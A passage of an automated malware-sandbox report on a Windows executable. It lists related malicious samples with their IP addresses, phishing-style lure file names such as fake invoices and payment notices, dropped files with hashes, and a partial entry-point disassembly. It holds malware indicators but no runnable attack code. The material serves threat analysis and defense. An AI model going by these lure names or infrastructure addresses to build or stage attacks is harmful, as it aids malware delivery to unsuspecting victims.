                                                          • 13.107.246.45
                                                          OKkUGRkZV7.exeGet hashmaliciousRemcosBrowse
                                                          • 13.107.246.45
                                                          https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 13.107.246.45
                                                          240815025266174071.jsGet hashmaliciousStrela DownloaderBrowse
                                                          • 13.107.246.45
                                                          hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                          • 13.107.246.45
                                                          ssbzmoy.bizLiuUGJK9vH.exeGet hashmaliciousFormBookBrowse
                                                          • 18.141.10.107
                                                          UaOJAOMxcU.exeGet hashmaliciousFormBookBrowse
                                                          • 18.141.10.107
                                                          SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 18.141.10.107
                                                          I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                                                          • 18.141.10.107
                                                          OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                          • 18.141.10.107
                                                          RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                          • 18.141.10.107
                                                          PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                          • 18.141.10.107
                                                          REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 18.141.10.107
                                                          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 18.141.10.107
                                                          INV_NE_02_2034388.exeGet hashmaliciousFormBookBrowse
                                                          • 18.141.10.107
                                                          r0lqcud7.nbnnn.xyzM7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                          • 202.79.161.151
                                                          order confirmation.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 23.225.159.42
                                                          quotation.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 202.79.161.151
                                                          lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          pywolwnvd.bizLiuUGJK9vH.exeGet hashmaliciousFormBookBrowse
                                                          • 54.244.188.177
                                                          UaOJAOMxcU.exeGet hashmaliciousFormBookBrowse
                                                          • 54.244.188.177
                                                          SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 54.244.188.177
                                                          I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                                                          • 54.244.188.177
                                                          OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                          • 54.244.188.177
                                                          RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                          • 54.244.188.177
                                                          PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                          • 54.244.188.177
                                                          REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 54.244.188.177
                                                          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 54.244.188.177
                                                          INV_NE_02_2034388.exeGet hashmaliciousFormBookBrowse
                                                          • 54.244.188.177
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          SAIC-ASUSFantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                          • 149.88.225.249
                                                          momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                          • 149.65.180.173
                                                          xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                          • 149.88.70.60
                                                          xd.mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 149.112.181.228
                                                          nklsh4.elfGet hashmaliciousUnknownBrowse
                                                          • 149.88.70.11
                                                          loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 149.65.132.204
                                                          m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 149.64.118.107
                                                          nshsh4.elfGet hashmaliciousMiraiBrowse
                                                          • 149.118.255.217
                                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 149.88.233.72
                                                          x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 149.88.73.7
                                                          CNSERVERSUSaBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                          • 154.90.58.209
                                                          QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                          • 172.247.112.164
                                                          arm.elfGet hashmaliciousMiraiBrowse
                                                          • 23.225.101.86
                                                          spc.elfGet hashmaliciousMiraiBrowse
                                                          • 23.225.150.24
                                                          sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 23.225.149.53
                                                          6.elfGet hashmaliciousUnknownBrowse
                                                          • 41.216.185.130
                                                          3.elfGet hashmaliciousUnknownBrowse
                                                          • 41.216.185.178
                                                          2.elfGet hashmaliciousUnknownBrowse
                                                          • 41.216.185.126
                                                          http://www.rr8844.comGet hashmaliciousUnknownBrowse
                                                          • 23.224.82.187
                                                          botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 23.225.125.76
                                                          AMAZON-02UShttps://noiclethomas.wixsite.com/riceGet hashmaliciousUnknownBrowse
                                                          • 99.86.4.105
                                                          phish_alert_sp2_2.0.0.0(4).emlGet hashmaliciousUnknownBrowse
                                                          • 108.128.172.10
                                                          https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                                          • 52.208.198.158
                                                          https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                                          • 13.32.110.93
                                                          https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                                                          • 108.138.26.78
                                                          25IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          LiuUGJK9vH.exeGet hashmaliciousFormBookBrowse
                                                          • 18.141.10.107
                                                          5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                          • 13.228.81.39
                                                          gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          UaOJAOMxcU.exeGet hashmaliciousFormBookBrowse
                                                          • 54.244.188.177
                                                          CONTABODE5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                          • 173.249.62.84
                                                          https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                          • 173.249.62.84
                                                          4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          82eqjqLrzE.exeGet hashmaliciousAsyncRATBrowse
                                                          • 144.91.79.54
                                                          DF2.exeGet hashmaliciousUnknownBrowse
                                                          • 173.249.2.110
                                                          Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                                          • 173.249.11.35
                                                          bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                          • 95.212.118.93
                                                          No context
                                                          No context
                                                          Process:C:\Users\user\Desktop\uG3I84bQEr.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1658880
                                                          Entropy (8bit):4.312995031181402
                                                          Encrypted:false
                                                          SSDEEP:24576:hxGBcmleVg9N9JMlDlfjRiVuVsWt5MJMs:3Gy+agFIDRRAubt5M
                                                          MD5:AB4B4378DE9DEF8797AA78370F33CFD7
                                                          SHA1:47C100F461FFE85FCE8BAE006CDCA0977A6EC263
                                                          SHA-256:CD5CEC0EB941B0EAE7C435959C2B4DEC90519E7DDCDB3042D0D18348507EF89B
                                                          SHA-512:C22D3CA83CE261E95812D319EAFC6E9248C28F9E355617A26320C77C48523CAA589525DFA69F1F52417CFC4DB370154C48CC46E5D1278CF0C23D096E58137925
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.................................a.......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\uG3I84bQEr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):289280
                                                          Entropy (8bit):7.994591387910061
                                                          Encrypted:true
                                                          SSDEEP:6144:6iRDsaKhBMinMYqmchi8bGnjpnjDC4VpvmLoMpITqeveqGCss:6eTKPM/pbhO9SGdmLPpIHveqd
                                                          MD5:188755497F2F9E69E3CD8691AD42C304
                                                          SHA1:9148457BA37C4191F0B2DDA89C9FD2603EF2A2CA
                                                          SHA-256:74275CA67FB35D3E6C5CC120BF6FCDAE2AB3CF00AC766610DE913296756C0AA6
                                                          SHA-512:9EDE3CF8773ACF4A7B86BD60F445EECB471332DFC3F64DCA0F1A02DA88442D460785544272B77C806990413B3FE1069AE00DAE71A9058D14FF0F93E2B72B0DF1
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:~..IMLL9BEF5..GN.Q979BBM.X03B5INLL9FEF5OFGNBQ979BBMZX03B5INL.9FEH*.HG.K...8..l.0Y@bE;!+>X+e%T!((:b3\.K7,m36.w.fi##(\hHK?kFGNBQ97@CK.g8W..U..q,^._...|').K...~"*.B....))..P%-{U(.GNBQ979B..ZX|2C5.8..9FEF5OFG.BS8<8IBM.\03B5INLL9.QF5OVGNB!=79B.MZH03B7INJL9FEF5O@GNBQ979B2IZX23B5INLN9..F5_FG^BQ97)BB]ZX03B5YNLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX0.6P1:LL92.B5OVGNB.=79RBMZX03B5INLL9FeF5/FGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03
                                                          Process:C:\Users\user\Desktop\uG3I84bQEr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14686
                                                          Entropy (8bit):7.625735285462023
                                                          Encrypted:false
                                                          SSDEEP:384:dTYznwyHtzwpHjuAlYRgqRjJODs3hrExexyTeVi6T:dAwyHtzwBKWpqRjvEWR
                                                          MD5:7E3D833B99A5C90D0BD5DCBB65B1E9E7
                                                          SHA1:7FC369656C987E37D0D9AC4F60C76C102AC1084E
                                                          SHA-256:4FBBE82F94EC26F88642E8A50F621538F8842D5D5387CD0F876D207AEA9B2344
                                                          SHA-512:8BDD87DFB94093AFC9F0FBB39868D68AE37D2BE7662E082AED8530B7E5E1AE876C06597EA43E751C762ACC36A286BA07359C70272467C6C7FD7D8212EEF7655F
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:EA06..0..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                          Process:C:\Users\user\Desktop\uG3I84bQEr.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):143378
                                                          Entropy (8bit):2.796291363337776
                                                          Encrypted:false
                                                          SSDEEP:192:mNxyGyDZFui3IObbFMMVQc3GkcVoudfSq5+vLkfrOVWF/qb35mwBgZNFJahYUt0j:E
                                                          MD5:9D0A030BAA779DC65897306F45354555
                                                          SHA1:5D3654F3E93E3CC6938B442E9DAB7A9716373C2A
                                                          SHA-256:271CF0E921ACBF54C70026FE40ADF10B54D89D7853E4FB28C83A4AE9BBB55235
                                                          SHA-512:3ABDBB11975AA19387C4A18C761B013050B8FF89F3E5BDB5EA8A3912BC0970FC18C1440D124215025A1145138D344957DBBFA40A2F49DA21EF2CE97D2001EAB6
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:2d0w02d0wx2d0w52d0w52d0w82d0wb2d0we2d0wc2d0w82d0w12d0we2d0wc2d0wc2d0wc2d0w02d0w22d0w02d0w02d0w02d0w02d0w52d0w62d0w52d0w72d0wb2d0w82d0w62d0wb2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0w42d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0w62d0wb2d0wa2d0w72d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0w82d0wb2d0w82d0w62d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0wa2d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0wc2d0wb2d0wa2d0w62d0wc2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0we2d0wb2d0w82d0w32d0w32d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w92d0w02d0wb2d0w92d0w32d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w92d0w22d0wb2d0wa2d0w22d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w92d0w42d0wb2d0w82d0w62d0w42d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w9
                                                          Process:C:\Users\user\Desktop\uG3I84bQEr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):289280
                                                          Entropy (8bit):7.994591387910061
                                                          Encrypted:true
                                                          SSDEEP:6144:6iRDsaKhBMinMYqmchi8bGnjpnjDC4VpvmLoMpITqeveqGCss:6eTKPM/pbhO9SGdmLPpIHveqd
                                                          MD5:188755497F2F9E69E3CD8691AD42C304
                                                          SHA1:9148457BA37C4191F0B2DDA89C9FD2603EF2A2CA
                                                          SHA-256:74275CA67FB35D3E6C5CC120BF6FCDAE2AB3CF00AC766610DE913296756C0AA6
                                                          SHA-512:9EDE3CF8773ACF4A7B86BD60F445EECB471332DFC3F64DCA0F1A02DA88442D460785544272B77C806990413B3FE1069AE00DAE71A9058D14FF0F93E2B72B0DF1
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:~..IMLL9BEF5..GN.Q979BBM.X03B5INLL9FEF5OFGNBQ979BBMZX03B5INL.9FEH*.HG.K...8..l.0Y@bE;!+>X+e%T!((:b3\.K7,m36.w.fi##(\hHK?kFGNBQ97@CK.g8W..U..q,^._...|').K...~"*.B....))..P%-{U(.GNBQ979B..ZX|2C5.8..9FEF5OFG.BS8<8IBM.\03B5INLL9.QF5OVGNB!=79B.MZH03B7INJL9FEF5O@GNBQ979B2IZX23B5INLN9..F5_FG^BQ97)BB]ZX03B5YNLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX0.6P1:LL92.B5OVGNB.=79RBMZX03B5INLL9FeF5/FGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03
                                                          Process:C:\Windows\SysWOW64\bitsadmin.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\uG3I84bQEr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):12320
                                                          Entropy (8bit):7.985461755367489
                                                          Encrypted:false
                                                          SSDEEP:384:nAk6OfxWtbWioqh/JtbUS0gr3BDpkD5uG3NW3rpyyLuO:1ios/TbUS0g7BDi8G3NW3rrLx
                                                          MD5:004A32530307023144D3EDDEDEE0FFEC
                                                          SHA1:E348C3501ECDA3FCC2E54509EFDB4AF7E40158FE
                                                          SHA-256:41D7083825FABAACC5C74F8383D8D077955A41631E7458AA10F704BE6AD6F107
                                                          SHA-512:78667834E1C0EB5760FE613B02E88CFA400B688BA15687CCCB977B9966EC3287836C0D5E5DD1006DFB694CB4B938E2D8ACBA5983374E965A868838B0454B6E0E
                                                          Malicious:false
                                                          Preview:.........Aw..q...7(e.9.<............t..-c6.F....?.$.....x..-..>......}..GB.j.....z)..t.......?G..S.U.._.... .x.?S..q(|...+....oB.....D....`....H...j.h.......c......-..r...>2.z...U...)..T.......".AKv..ON....X..,{4J...1.w1.r.{j..`.E..3..7eV2B.G..E....O.N(....]'t....u.)}..|}...].a.e....mr......l.*.b.BO....3..J;T..5.G.80..-Q+....V;..2..O..l.#6mPw..{....G..g....H.W-&."Bb_...?........H.7A..F..7B......!.\YIk..A;.W......x.]......^P...-..<.j...W..0-.......=?.D.hMeE.../...a...F......,.n..C.\S........"..(g$.q..Dk..t{....VN.O.&Ua.-....`..a....S..V..v...}.$d...M....W6...d.}OJ(......6.....s..!.bOp.oM.FJ...2j.G../K.*...............x\AG...=..O..q.Jc..$../....n#F........".Q.0N{.."...pO)1.P,...$..yd.-.I.............J....<...'.f.......\b......5.!.\....z.Y.em.....o..~^D3...y.......E.1....2z..'...KN...T......P._e.\o@h.......0tO5.M..(9........j33..K..6...."...8..,7.ZP.J.........2. R...E........E..<..CD=}<....J8/.5._.....DE.`.'..........B.i..y...`>...0...
                                                          Process:C:\Users\user\Desktop\uG3I84bQEr.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:modified
                                                          Size (bytes):1348608
                                                          Entropy (8bit):7.251573765346784
                                                          Encrypted:false
                                                          SSDEEP:24576:vQW4qoNUgslKNX0Ip0MgHCpoMBOubVg9N9JMlDlfjRiVuVsWt5MJMs:vQW9BKNX0IPgiKMBOuJgFIDRRAubt5M
                                                          MD5:CFABD8BE357A65A9CA2C92F0028803C9
                                                          SHA1:19BEB97D4FC9C53C52C16AE2C0DDE8C825E35E57
                                                          SHA-256:ACBF54A3CEC7912A2BA07684E4D39D095B8A2978B570B30DA8FD68FB8B6E310E
                                                          SHA-512:EEFF1C88D5B1C1DA583DE61F58E59F10843F46F38EFE1831A7CCD097C0C45C7029C481A74E0A819A493C6F61DC860969619662F37E626C02D6C797CDFDF8C9DC
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\uG3I84bQEr.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1594368
                                                          Entropy (8bit):4.175692172796217
                                                          Encrypted:false
                                                          SSDEEP:12288:oEP3RFTV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:DFZVg9N9JMlDlfjRiVuVsWt5MJMs
                                                          MD5:EB607CDF7D5BB12D72F7C0C992646A55
                                                          SHA1:4FB2B90E17A3AC9D85718E8D3713EBABD7A41B26
                                                          SHA-256:9CE5077B0DEC9A61210258092F59B5723B4D94AB146418062023474D8BE59744
                                                          SHA-512:D2666847F797A8C69AD340422CEFBE2A6DC2E1F04A19B8643282A38279F9F64D3D042CC8F14CF2D242A1F8771932B59212DD83895D4369904A0CD5A29186FD78
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................Te.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.505754253178229
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:uG3I84bQEr.exe
                                                          File size:1'762'816 bytes
                                                          MD5:22b40728c8fb1599479347ba89387ef4
                                                          SHA1:7d951dd272c9b0b1e4295872d0004eb711f0eabb
                                                          SHA256:fced488bab6f8793e1ca19858cf208ebc5c2b0ee18087489a2a35eb7fee803af
                                                          SHA512:1717078f2f5e7d0416ac6b8bfafc9e31b6e6870654a8a1c03b928fd7c62f85154a5fb1eb4388532c7f273d56dd535bd267859eb5c7d8389741f00987c78c9223
                                                          SSDEEP:49152:yd0c++OCvkGs9FaoePIiMbOYWgFIDRRAubt5M:eB3vkJ9DiMaWUf
                                                          TLSH:3F85E02273DDC361CB669173FF29B7016EBF7C214630B85B2F940D79A950162262DBA3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                          Icon Hash:aaf3e3e3938382a0
                                                          Entrypoint:0x427dcd
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6756D804 [Mon Dec 9 11:44:04 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                          Instruction
                                                          call 00007F06C0B83B0Ah
                                                          jmp 00007F06C0B768D4h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [esp+10h]
                                                          mov ecx, dword ptr [esp+14h]
                                                          mov edi, dword ptr [esp+0Ch]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007F06C0B76A5Ah
                                                          cmp edi, eax
                                                          jc 00007F06C0B76DBEh
                                                          bt dword ptr [004C31FCh], 01h
                                                          jnc 00007F06C0B76A59h
                                                          rep movsb
                                                          jmp 00007F06C0B76D6Ch
                                                          cmp ecx, 00000080h
                                                          jc 00007F06C0B76C24h
                                                          mov eax, edi
                                                          xor eax, esi
                                                          test eax, 0000000Fh
                                                          jne 00007F06C0B76A60h
                                                          bt dword ptr [004BE324h], 01h
                                                          jc 00007F06C0B76F30h
                                                          bt dword ptr [004C31FCh], 00000000h
                                                          jnc 00007F06C0B76BFDh
                                                          test edi, 00000003h
                                                          jne 00007F06C0B76C0Eh
                                                          test esi, 00000003h
                                                          jne 00007F06C0B76BEDh
                                                          bt edi, 02h
                                                          jnc 00007F06C0B76A5Fh
                                                          mov eax, dword ptr [esi]
                                                          sub ecx, 04h
                                                          lea esi, dword ptr [esi+04h]
